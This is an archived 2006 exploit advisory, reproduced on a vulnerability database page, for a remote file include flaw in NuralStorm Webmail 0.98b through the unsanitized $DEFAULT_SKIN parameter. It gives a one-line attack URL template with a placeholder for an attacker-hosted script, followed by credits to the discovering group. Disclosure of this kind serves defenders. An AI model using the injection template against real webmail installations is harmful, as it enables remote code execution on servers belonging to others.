Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14710
HistoryOct 15, 2006 - 12:00 a.m.

NuralStorm Webmail <= 0.98b Remote File Include Vulnerability

2006-10-1500:00:00
vulners.com
18
JSON

NuralStorm Webmail <= 0.98b Remote File Include Vulnerability

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous

Affected software description :

Application : NuralStorm Webmail Client
version : 0.98b
Download: http://art-futura.w.interia.pl/przyklady/file/webmail098b.zip
------------------------------------------------------------------


Exploit:
~~~~~~~~
Variable $DEFAULT_SKIN not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/process.php?DEFAULT_SKIN=[Evil_Script]
---------------------------------------------------------------------------

Shoutz:
~~~~~~~

# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
__/*

# milw0rm.com [2006-10-15]
JSON